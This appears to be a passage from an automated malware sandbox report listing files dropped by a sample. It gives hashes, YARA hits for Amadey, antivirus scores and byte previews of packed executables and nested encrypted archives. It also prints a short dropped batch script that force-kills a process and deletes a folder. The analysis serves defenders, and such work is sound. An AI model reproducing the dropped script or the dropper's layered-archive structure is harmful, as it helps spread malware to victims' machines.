                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2.......1...@.................................W...k.............................1.............................D.1..................................................... . ............................@....rsrc...............................@....idata ............................@...dblbhqnk..+.......+.................@...rrjzixml......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):439296
                                                                                                                                                                                                                                                              Entropy (8bit):6.4903731089009495
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                              SHA1:B9B0253480A1B6CBDD673383320FECAE5EFB3DCE
                                                                                                                                                                                                                                                              SHA-256:2E3A5DFA44D59681A60D78B8B08A1AF3878D8E270C02D7E31A0876A85EB42A7E
                                                                                                                                                                                                                                                              SHA-512:C2B8D15B0DC1B0846F39CE007BE2DEB41D5B6AE76AF90D618F29DA8691ED987C42F3C270F0EA7F4D10CBD2D3877118F4133803C9C965B6FF236FF8CFAFD9367C
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....3dg............................'.............@..........................0............@..................................E...................................E......8...............................@...............<............................text...j........................... ..`.rdata...H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1679360
                                                                                                                                                                                                                                                              Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                              SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                              SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                              SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):468992
                                                                                                                                                                                                                                                              Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                              SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                              SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):222
                                                                                                                                                                                                                                                              Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                              SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                              SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                              SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2355713
                                                                                                                                                                                                                                                              Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                                              SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                                              SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                                              SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1799594
                                                                                                                                                                                                                                                              Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                                                              SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                                                              SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                                                              SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1799748
                                                                                                                                                                                                                                                              Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                                                              SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                                                              SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                                                              SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1799902
                                                                                                                                                                                                                                                              Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                                                              SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                                                              SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                                                              SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1800056
                                                                                                                                                                                                                                                              Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                                                              SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                                                              SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                                                              SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1800210
                                                                                                                                                                                                                                                              Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                                                              SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                                                              SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                                                              SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1800364
                                                                                                                                                                                                                                                              Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                                              SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                                              SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                                              SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3473559
                                                                                                                                                                                                                                                              Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                                              SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                                              SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                                              SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
